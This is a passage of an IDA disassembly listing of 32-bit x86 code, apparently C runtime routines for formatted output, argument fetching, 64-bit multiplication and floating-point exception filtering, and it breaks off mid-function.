var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_4044A5
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_403DC0
; ---------------------------------------------------------------------------
loc_403DB8: ; CODE XREF: sub_403D8C+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_403DC0: ; CODE XREF: sub_403D8C+2A�j
cmp [ebp+var_14], edx
jl loc_4044A5
cmp bl, 20h
jl short loc_403DE1
cmp bl, 78h
jg short loc_403DE1
movsx eax, bl
mov al, byte_408124[eax]
and eax, 0Fh
jmp short loc_403DE3
; ---------------------------------------------------------------------------
loc_403DE1: ; CODE XREF: sub_403D8C+40�j
; sub_403D8C+45�j
xor eax, eax
loc_403DE3: ; CODE XREF: sub_403D8C+53�j
movsx eax, byte_408144[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_404494 ; default
jmp off_4044AD[eax*4] ; switch jump
loc_403E01: ; DATA XREF: .data:off_4044AD�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00403DFA case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E1C: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
movsx eax, bl ; jumptable 00403DFA case 2
sub eax, 20h
jz short loc_403E5F
sub eax, 3
jz short loc_403E56
sub eax, 8
jz short loc_403E4D
dec eax
dec eax
jz short loc_403E44
sub eax, 3
jnz loc_404494 ; default
or [ebp+var_4], 8
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E44: ; CODE XREF: sub_403D8C+A4�j
or [ebp+var_4], 4
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E4D: ; CODE XREF: sub_403D8C+A0�j
or [ebp+var_4], 1
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E56: ; CODE XREF: sub_403D8C+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E5F: ; CODE XREF: sub_403D8C+96�j
or [ebp+var_4], 2
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E68: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
cmp bl, 2Ah ; jumptable 00403DFA case 3
jnz short loc_403E90
lea eax, [ebp+arg_8]
push eax
call sub_40456B
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_404494 ; default
or [ebp+var_4], 4
neg eax
loc_403E88: ; CODE XREF: sub_403D8C+111�j
mov [ebp+var_20], eax
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403E90: ; CODE XREF: sub_403D8C+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_403E88
; ---------------------------------------------------------------------------
loc_403E9F: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
mov [ebp+var_10], edx ; jumptable 00403DFA case 4
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
cmp bl, 2Ah ; jumptable 00403DFA case 5
jnz short loc_403ECA
lea eax, [ebp+arg_8]
push eax
call sub_40456B
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_404494 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403ECA: ; CODE XREF: sub_403D8C+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403EDC: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
cmp bl, 49h ; jumptable 00403DFA case 6
jz short loc_403F0F
cmp bl, 68h
jz short loc_403F06
cmp bl, 6Ch
jz short loc_403EFD
cmp bl, 77h
jnz loc_404494 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403EFD: ; CODE XREF: sub_403D8C+15D�j
or [ebp+var_4], 10h
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403F06: ; CODE XREF: sub_403D8C+158�j
or [ebp+var_4], 20h
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403F0F: ; CODE XREF: sub_403D8C+153�j
cmp byte ptr [edi], 36h
jnz short loc_403F28
cmp byte ptr [edi+1], 34h
jnz short loc_403F28
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403F28: ; CODE XREF: sub_403D8C+186�j
; sub_403D8C+18C�j
mov [ebp+var_30], edx
loc_403F2B: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
mov ecx, off_409108 ; jumptable 00403DFA case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_403F57
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4044CD
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_403F57: ; CODE XREF: sub_403D8C+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4044CD
add esp, 0Ch
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_403F6F: ; CODE XREF: sub_403D8C+6E�j
; DATA XREF: .data:off_4044AD�o
movsx eax, bl ; jumptable 00403DFA case 7
cmp eax, 67h
jg loc_404197
cmp eax, 65h
jge loc_40401A
cmp eax, 58h
jg loc_404078
jz loc_40420B
sub eax, 43h
jz loc_40403B
dec eax
dec eax
jz short loc_404010
dec eax
dec eax
jz short loc_404010
sub eax, 0Ch
jnz loc_404396
test word ptr [ebp+var_4], 830h
jnz short loc_403FB9
or byte ptr [ebp+var_4+1], 8
loc_403FB9: ; CODE XREF: sub_403D8C+227�j
; sub_403D8C+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_403FC6
mov esi, 7FFFFFFFh
loc_403FC6: ; CODE XREF: sub_403D8C+233�j
lea eax, [ebp+arg_8]
push eax
call sub_40456B
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_4041DF
test ecx, ecx
jnz short loc_403FEE
mov ecx, off_409104
mov [ebp+var_8], ecx
loc_403FEE: ; CODE XREF: sub_403D8C+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_403FF7: ; CODE XREF: sub_403D8C+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_4041D6
cmp word ptr [eax], 0
jz loc_4041D6
inc eax
inc eax
jmp short loc_403FF7
; ---------------------------------------------------------------------------
loc_404010: ; CODE XREF: sub_403D8C+212�j
; sub_403D8C+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_40401A: ; CODE XREF: sub_403D8C+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_4040FE
mov [ebp+var_10], 6
jmp loc_40410C
; ---------------------------------------------------------------------------
loc_40403B: ; CODE XREF: sub_403D8C+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_404047
or byte ptr [ebp+var_4+1], 8
loc_404047: ; CODE XREF: sub_403D8C+2B5�j
; sub_403D8C+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_40408E
call sub_404588
push eax
lea eax, [ebp+var_248]
push eax
call sub_405C0B
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_4040A1
mov [ebp+var_28], 1
jmp short loc_4040A1
; ---------------------------------------------------------------------------
loc_404078: ; CODE XREF: sub_403D8C+1FB�j
sub eax, 5Ah
jz short loc_4040AF
sub eax, 9
jz short loc_404047
dec eax
jz loc_404271
jmp loc_404396
; ---------------------------------------------------------------------------
loc_40408E: ; CODE XREF: sub_403D8C+2C5�j
call sub_40456B
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_4040A1: ; CODE XREF: sub_403D8C+2E1�j
; sub_403D8C+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_404396
; ---------------------------------------------------------------------------
loc_4040AF: ; CODE XREF: sub_403D8C+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_40456B
test eax, eax
pop ecx
jz short loc_4040F0
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4040F0
test byte ptr [ebp+var_4+1], 8
jz short loc_4040E1
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_404396
; ---------------------------------------------------------------------------
loc_4040E1: ; CODE XREF: sub_403D8C+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_404393
; ---------------------------------------------------------------------------
loc_4040F0: ; CODE XREF: sub_403D8C+32F�j
; sub_403D8C+336�j
mov eax, off_409100
mov [ebp+var_8], eax
push eax
jmp loc_40418C
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_403D8C+29D�j
jnz short loc_40410C
cmp bl, 67h
jnz short loc_40410C
mov [ebp+var_10], 1
loc_40410C: ; CODE XREF: sub_403D8C+2AA�j
; sub_403D8C:loc_4040FE�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_4097E0
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_40415E
cmp [ebp+var_10], 0
jnz short loc_40415E
lea eax, [ebp+var_248]
push eax
call off_4097EC
pop ecx
loc_40415E: ; CODE XREF: sub_403D8C+3BC�j
; sub_403D8C+3C2�j
cmp bl, 67h
jnz short loc_404175
test esi, esi
jnz short loc_404175
lea eax, [ebp+var_248]
push eax
call off_4097E4
pop ecx
loc_404175: ; CODE XREF: sub_403D8C+3D5�j
; sub_403D8C+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_40418B
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_40418B: ; CODE XREF: sub_403D8C+3F0�j
push edi
loc_40418C: ; CODE XREF: sub_403D8C+36D�j
call sub_405B90
pop ecx
jmp loc_404393
; ---------------------------------------------------------------------------
loc_404197: ; CODE XREF: sub_403D8C+1E9�j
sub eax, 69h
jz loc_404271
sub eax, 5
jz loc_404247
dec eax
jz loc_404234
dec eax
jz short loc_404204
sub eax, 3
jz loc_403FB9
dec eax
dec eax
jz loc_404275
sub eax, 3
jnz loc_404396
mov [ebp+var_2C], 27h
jmp short loc_404212
; ---------------------------------------------------------------------------
loc_4041D6: ; CODE XREF: sub_403D8C+270�j
; sub_403D8C+27A�j
sub eax, ecx
sar eax, 1
jmp loc_404393
; ---------------------------------------------------------------------------
loc_4041DF: ; CODE XREF: sub_403D8C+24F�j
test ecx, ecx
jnz short loc_4041EC
mov ecx, off_409100
mov [ebp+var_8], ecx
loc_4041EC: ; CODE XREF: sub_403D8C+455�j
mov eax, ecx
loc_4041EE: ; CODE XREF: sub_403D8C+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4041FD
cmp byte ptr [eax], 0
jz short loc_4041FD
inc eax
jmp short loc_4041EE
; ---------------------------------------------------------------------------
loc_4041FD: ; CODE XREF: sub_403D8C+467�j
; sub_403D8C+46C�j
sub eax, ecx
jmp loc_404393
; ---------------------------------------------------------------------------
loc_404204: ; CODE XREF: sub_403D8C+425�j
mov [ebp+var_10], 8
loc_40420B: ; CODE XREF: sub_403D8C+201�j
mov [ebp+var_2C], 7
loc_404212: ; CODE XREF: sub_403D8C+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_40427C
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_40427C
; ---------------------------------------------------------------------------
loc_404234: ; CODE XREF: sub_403D8C+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_40427C
or byte ptr [ebp+var_4+1], 2
jmp short loc_40427C
; ---------------------------------------------------------------------------
loc_404247: ; CODE XREF: sub_403D8C+417�j
lea eax, [ebp+arg_8]
push eax
call sub_40456B
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_404260
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_404265
; ---------------------------------------------------------------------------
loc_404260: ; CODE XREF: sub_403D8C+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_404265: ; CODE XREF: sub_403D8C+4D2�j
mov [ebp+var_28], 1
jmp loc_404494 ; default
; ---------------------------------------------------------------------------
loc_404271: ; CODE XREF: sub_403D8C+2F7�j
; sub_403D8C+40E�j
or [ebp+var_4], 40h
loc_404275: ; CODE XREF: sub_403D8C+432�j
mov [ebp+var_C], 0Ah
loc_40427C: ; CODE XREF: sub_403D8C+491�j
; sub_403D8C+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_40428E
lea eax, [ebp+arg_8]
push eax
call sub_404578
pop ecx
jmp short loc_4042CF
; ---------------------------------------------------------------------------
loc_40428E: ; CODE XREF: sub_403D8C+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_4042B5
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_4042AA
call sub_40456B
pop ecx
movsx eax, ax
loc_4042A7: ; CODE XREF: sub_403D8C+527�j
; sub_403D8C+539�j
cdq
jmp short loc_4042CF
; ---------------------------------------------------------------------------
loc_4042AA: ; CODE XREF: sub_403D8C+510�j
call sub_40456B
pop ecx
movzx eax, ax
jmp short loc_4042A7
; ---------------------------------------------------------------------------
loc_4042B5: ; CODE XREF: sub_403D8C+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_4042C7
call sub_40456B
pop ecx
jmp short loc_4042A7
; ---------------------------------------------------------------------------
loc_4042C7: ; CODE XREF: sub_403D8C+531�j
call sub_40456B
pop ecx
xor edx, edx
loc_4042CF: ; CODE XREF: sub_403D8C+500�j
; sub_403D8C+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4042F0
test edx, edx
jg short loc_4042F0
jl short loc_4042DF
test eax, eax
jnb short loc_4042F0
loc_4042DF: ; CODE XREF: sub_403D8C+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4042F4
; ---------------------------------------------------------------------------
loc_4042F0: ; CODE XREF: sub_403D8C+547�j
; sub_403D8C+54B�j ...
mov esi, eax
mov edi, edx
loc_4042F4: ; CODE XREF: sub_403D8C+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4042FD
and edi, 0
loc_4042FD: ; CODE XREF: sub_403D8C+56C�j
cmp [ebp+var_10], 0
jge short loc_40430C
mov [ebp+var_10], 1
jmp short loc_404310
; ---------------------------------------------------------------------------
loc_40430C: ; CODE XREF: sub_403D8C+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_404310: ; CODE XREF: sub_403D8C+57E�j
mov eax, esi
or eax, edi
jnz short loc_40431A
and [ebp+var_1C], 0
loc_40431A: ; CODE XREF: sub_403D8C+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_404320: ; CODE XREF: sub_403D8C+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_404330
mov eax, esi
or eax, edi
jz short loc_40436B
loc_404330: ; CODE XREF: sub_403D8C+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_405CF0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_405C80
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_404361
add ebx, [ebp+var_2C]
loc_404361: ; CODE XREF: sub_403D8C+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_404320
; ---------------------------------------------------------------------------
loc_40436B: ; CODE XREF: sub_403D8C+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_404396
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_404389
test eax, eax
jnz short loc_404396
loc_404389: ; CODE XREF: sub_403D8C+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_404393: ; CODE XREF: sub_403D8C+35F�j
; sub_403D8C+406�j ...
mov [ebp+var_C], eax
loc_404396: ; CODE XREF: sub_403D8C+21B�j
; sub_403D8C+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_404494 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_4043CE
test bh, 1
jz short loc_4043B3
mov [ebp+var_16], 2Dh
jmp short loc_4043C7
; ---------------------------------------------------------------------------
loc_4043B3: ; CODE XREF: sub_403D8C+61F�j
test bl, 1
jz short loc_4043BE
mov [ebp+var_16], 2Bh
jmp short loc_4043C7
; ---------------------------------------------------------------------------
loc_4043BE: ; CODE XREF: sub_403D8C+62A�j
test bl, 2
jz short loc_4043CE
mov [ebp+var_16], 20h
loc_4043C7: ; CODE XREF: sub_403D8C+625�j
; sub_403D8C+630�j
mov [ebp+var_1C], 1
loc_4043CE: ; CODE XREF: sub_403D8C+61A�j
; sub_403D8C+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_4043EE
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_404502
add esp, 10h
loc_4043EE: ; CODE XREF: sub_403D8C+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_404533
add esp, 10h
test bl, 8
jz short loc_404420
test bl, 4
jnz short loc_404420
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_404502
add esp, 10h
loc_404420: ; CODE XREF: sub_403D8C+67B�j
; sub_403D8C+680�j
cmp [ebp+var_24], 0
jz short loc_404467
cmp [ebp+var_C], 0
jle short loc_404467
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_404435: ; CODE XREF: sub_403D8C+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_405C0B
pop ecx
test eax, eax
pop ecx
jle short loc_40447C
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_404533
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_404435
jmp short loc_40447C
; ---------------------------------------------------------------------------
loc_404467: ; CODE XREF: sub_403D8C+698�j
; sub_403D8C+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_404533
add esp, 10h
loc_40447C: ; CODE XREF: sub_403D8C+6BC�j
; sub_403D8C+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_404494 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_404502
add esp, 10h
loc_404494: ; CODE XREF: sub_403D8C+68�j
; sub_403D8C+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_403DB8
loc_4044A5: ; CODE XREF: sub_403D8C+1F�j
; sub_403D8C+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_403D8C endp
; ---------------------------------------------------------------------------
off_4044AD dd offset loc_403F2B ; DATA XREF: sub_403D8C+6E�r
dd offset loc_403E01 ; jump table for switch statement
dd offset loc_403E1C
dd offset loc_403E68
dd offset loc_403E9F
dd offset loc_403EA7
dd offset loc_403EDC
dd offset loc_403F6F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044CD proc near ; CODE XREF: sub_403D8C+1BD�p
; sub_403D8C+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_4044E6
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4044F1
; ---------------------------------------------------------------------------
loc_4044E6: ; CODE XREF: sub_4044CD+9�j
push ecx
push [ebp+arg_0]
call sub_403C77
pop ecx
pop ecx
loc_4044F1: ; CODE XREF: sub_4044CD+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4044FE
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4044FE: ; CODE XREF: sub_4044CD+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_4044CD endp
; =============== S U B R O U T I N E =======================================
sub_404502 proc near ; CODE XREF: sub_403D8C+65A�p
; sub_403D8C+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_404530
mov esi, [esp+8+arg_C]
loc_404513: ; CODE XREF: sub_404502+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_4044CD
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_404530
mov eax, edi
dec edi
test eax, eax
jg short loc_404513
loc_404530: ; CODE XREF: sub_404502+B�j
; sub_404502+25�j
pop edi
pop esi
retn
sub_404502 endp
; =============== S U B R O U T I N E =======================================
sub_404533 proc near ; CODE XREF: sub_403D8C+670�p
; sub_403D8C+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_404567
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_404549: ; CODE XREF: sub_404533+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_4044CD
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_404567
mov eax, ebx
dec ebx
test eax, eax
jg short loc_404549
loc_404567: ; CODE XREF: sub_404533+C�j
; sub_404533+2B�j
pop edi
pop esi
pop ebx
retn
sub_404533 endp
; =============== S U B R O U T I N E =======================================
sub_40456B proc near ; CODE XREF: sub_403D8C+E5�p
; sub_403D8C+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_40456B endp
; =============== S U B R O U T I N E =======================================
sub_404578 proc near ; CODE XREF: sub_403D8C+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_404578 endp
; =============== S U B R O U T I N E =======================================
sub_404588 proc near ; CODE XREF: sub_403D8C+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_404588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404596 proc near ; CODE XREF: sub_402BE9+17�p
; sub_402BE9+58�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_4045B4
mov ecx, off_409108
movzx eax, word ptr [ecx+eax*2]
jmp short loc_404606
; ---------------------------------------------------------------------------
loc_4045B4: ; CODE XREF: sub_404596+10�j
mov ecx, eax
push esi
mov esi, off_409108
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4045D9
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4045E2
; ---------------------------------------------------------------------------
loc_4045D9: ; CODE XREF: sub_404596+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4045E2: ; CODE XREF: sub_404596+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_405D65
add esp, 1Ch
test eax, eax
jnz short loc_404602
leave
retn
; ---------------------------------------------------------------------------
loc_404602: ; CODE XREF: sub_404596+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_404606: ; CODE XREF: sub_404596+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_404596 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_404629
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_404629: ; CODE XREF: .data:0040461E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404644 proc near ; CODE XREF: .data:00402FC3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_404785
test eax, eax
pop ecx
jz loc_404779
mov ebx, [eax+8]
test ebx, ebx
jz loc_404779
cmp ebx, 5
jnz short loc_404675
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_404782
; ---------------------------------------------------------------------------
loc_404675: ; CODE XREF: sub_404644+23�j
cmp ebx, 1
jz loc_404774
mov ecx, dword_409AFC
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_409AFC, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_404764
mov ecx, dword_409398
mov edx, dword_40939C
add edx, ecx
push esi
cmp ecx, edx
jge short loc_4046C4
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:409328h[esi*4]
loc_4046BB: ; CODE XREF: sub_404644+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_4046BB
loc_4046C4: ; CODE XREF: sub_404644+69�j
mov eax, [eax]
mov esi, dword_4093A4
cmp eax, 0C000008Eh
jnz short loc_4046DF
mov dword_4093A4, 83h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_4046DF: ; CODE XREF: sub_404644+8D�j
cmp eax, 0C0000090h
jnz short loc_4046F2
mov dword_4093A4, 81h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_4046F2: ; CODE XREF: sub_404644+A0�j
cmp eax, 0C0000091h
jnz short loc_404705
mov dword_4093A4, 84h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_404705: ; CODE XREF: sub_404644+B3�j
cmp eax, 0C0000093h
jnz short loc_404718
mov dword_4093A4, 85h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_404718: ; CODE XREF: sub_404644+C6�j
cmp eax, 0C000008Dh
jnz short loc_40472B
mov dword_4093A4, 82h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_40472B: ; CODE XREF: sub_404644+D9�j
cmp eax, 0C000008Fh
jnz short loc_40473E
mov dword_4093A4, 86h
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_40473E: ; CODE XREF: sub_404644+EC�j
cmp eax, 0C0000092h
jnz short loc_40474F
mov dword_4093A4, 8Ah
loc_40474F: ; CODE XREF: sub_404644+99�j
; sub_404644+AC�j ...
push dword_4093A4
push 8
call ebx
pop ecx
mov dword_4093A4, esi
pop ecx
pop esi
jmp short loc_40476C
; ---------------------------------------------------------------------------
loc_404764: ; CODE XREF: sub_404644+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
